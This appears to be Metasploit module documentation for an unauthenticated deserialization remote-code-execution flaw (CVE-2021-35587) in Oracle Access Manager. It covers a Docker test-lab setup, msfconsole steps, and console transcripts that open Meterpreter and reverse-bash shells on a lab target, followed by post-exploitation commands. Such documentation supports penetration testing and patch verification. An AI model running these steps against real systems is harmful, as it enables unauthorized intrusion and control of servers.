## Vulnerable Application
This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO
Agent component of the Oracle Access Manager (OAM) product. The affected product versions are 11.1.2.3.0,
12.2.1.3.0, and 12.2.1.4.0.

## Testing
To install a vulnerable instance of OAM 12.2.1.4.0, you can use Docker image from this
[Oracle Container Registry](https://container-registry.oracle.com/ords/ocr/ba/middleware/oam), and follow this [tutorial](https://docs.oracle.com/en/middleware/idm/access-manager/12.2.1.4/tutorial-oam-docker/).

An overview of the steps are shown below, however we recommend you follow the above tutorial for a complete
understanding of the process.

Login to the Oracle container registry and pull down the OAM image. Note, you will need to sign in and accept the EULA
via your browser first. You will also need an Oracle DB instance, we used the `banglamon/oracle193db` image. You will
need to create a bridged network for the container to use.

```
docker login container-registry.oracle.com
docker pull container-registry.oracle.com/middleware/oam:12.2.1.4.0
docker pull banglamon/oracle193db:19.3.0-ee
docker network create -d bridge OamNET
```

Bring up the database container (This can take a few minutes).

```
mkdir /opt/oracle/
mkdir /opt/oracle/db/
docker run -d --name oracle19db --network=OamNET -p 1521:1521 -e ORACLE_SID=SID -e ORACLE_PDB=PDB_TEST -e ORACLE_PWD=Testing12345 -v /opt/oracle/db:/opt/oracle/oradata banglamon/oracle193db:19.3.0-ee

This command can take a few minutes (nearly 20 min in my case).  You can watch the creation process by running `docker container logs oracle19db`  Do not continue until it completes.

docker exec -it oracle19db bash -c "source /home/oracle/.bashrc; sqlplus /nolog"
```

In the `oracle19db` containers `SQL>` prompt, you can verify the PDB exists.

```
	SQL> conn / as sysdba
	Connected.
	SQL> show pdbs

	    CON_ID CON_NAME			  OPEN MODE  RESTRICTED
	---------- ------------------------------ ---------- ----------
		 2 PDB$SEED			  READ ONLY  NO
		 4 PDB_TEST			  READ WRITE NO
```

Back on the host, create a file `/opt/oracle/oam-admin.env` with the following contents.

```
DOMAIN_NAME=access_domain
ADMIN_USER=weblogic
ADMIN_PASSWORD=Testing12345
ADMIN_LISTEN_HOST=oamadmin
ADMIN_LISTEN_PORT=7001
CONNECTION_STRING=oracle19db:1521/pdb_test
RCUPREFIX=OAM01
DB_USER=sys
DB_PASSWORD=Testing12345
DB_SCHEMA_PASSWORD=Testing12345
```

And bring up the `oamadmin` container (You can verify this has worked via `docker log`).

```
mkdir /opt/oracle/user_projects
chmod 777 /opt/oracle/user_projects
docker run -d -p 7001:7001 --name oamadmin --network=OamNET --env-file /opt/oracle/oam-admin.env --volume /opt/oracle/user_projects:/u01/oracle/user_projects container-registry.oracle.com/middleware/oam:12.2.1.4.0
```

Create a file `/opt/oracle/oam-ms.env` with the following contents.

```
DOMAIN_NAME=access_domain
ADMIN_USER=weblogic
ADMIN_PASSWORD=Testing12345
ADMIN_LISTEN_HOST=oamadmin
ADMIN_LISTEN_PORT=7001
MANAGEDSERVER_PORT=14100
MANAGED_SERVER_CONTAINER=true
MS_HOST=oamms
MS_NAME=oam_server1
```

And bring up the `oamms` container.

```
docker run -d -p 14100:14100 --network=OamNET --volumes-from oamadmin --name oamms --env-file /opt/oracle/oam-ms.env container-registry.oracle.com/middleware/oam:12.2.1.4.0 "/u01/oracle/dockertools/startMS.sh"
```

You should now be able to reach the `oamadmin` container via a browser at: http://127.0.0.1:7001/oamconsole/faces/login.jspx

You should now be able to reach the `oamms` container via a browser at: http://127.0.0.1:14100/oam/pages/login.jsp

The `oamms` container is what this exploit targets.

## Verification Steps
1. Start msfconsole
2. `use exploit/multi/http/oracle_access_manager_rce_cve_2021_35587`
3. `set TARGET 0`
4. `set RHOST <TARGET_IP_ADDRESS>`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
6. `set LHOST eth0`
7. `set LPORT 4444`
8. `check`
9. `exploit`

## Scenarios

### Linux Command

```
msf6 > use exploit/multi/http/oracle_access_manager_rce_cve_2021_35587 
[*] Using configured payload cmd/linux/https/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set TARGET 0
TARGET => 0
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set PAYLOAD cmd/linux/https/x64/meterpreter_reverse_tcp 
PAYLOAD => cmd/linux/https/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set RHOSTS 192.168.86.70
RHOSTS => 192.168.86.70
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > show options 

Module options (exploit/multi/http/oracle_access_manager_rce_cve_2021_35587):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.70    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      14100            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /oam/            yes       The base path to the OAM application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/https/x64/meterpreter_reverse_tcp):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FETCH_CHECK_CERT  false            yes       Check SSL certificate
   FETCH_COMMAND     CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE      true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS    none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Pytho
                                                n variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
   FETCH_SRVHOST                      no        Local IP to use for serving payload
   FETCH_SRVPORT     8080             yes       Local port to use for serving payload
   FETCH_URIPATH                      no        Local URI to use for serving payload
   LHOST             eth0             yes       The listen address (an interface may be specified)
   LPORT             4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      JLIwdQAt         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > check
[*] 192.168.86.70:14100 - The target appears to be vulnerable. Oracle Access Manager 12.2.1.4.0.
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Oracle Access Manager 12.2.1.4.0.
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.70:49264) at 2025-04-01 12:34:15 +0100

meterpreter > getuid
Server username: oracle
meterpreter > sysinfo
Computer     : 172.18.0.4
OS           : Oracle 7.9 (Linux 6.5.0-14-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/u01/oracle/user_projects/domains/access_domain
meterpreter >
```

### Unix Command

```
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > unset Payload
Unsetting Payload...
[!] Variable "Payload" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear Payload
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > set target 2
target => 2
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > show options 

Module options (exploit/multi/http/oracle_access_manager_rce_cve_2021_35587):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.86.70    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      14100            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /oam/            yes       The base path to the OAM application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > check
[*] 192.168.86.70:14100 - The target appears to be vulnerable. Oracle Access Manager 12.2.1.4.0.
msf6 exploit(multi/http/oracle_access_manager_rce_cve_2021_35587) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Oracle Access Manager 12.2.1.4.0.
[*] Command shell session 2 opened (192.168.86.122:4444 -> 192.168.86.70:55776) at 2025-04-02 15:23:35 +0100

id
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
uname -a
Linux 03b1805a74e3 6.8.0-57-generic #59~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Mar 19 17:07:41 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
pwd
/u01/oracle/user_projects/domains/access_domain
```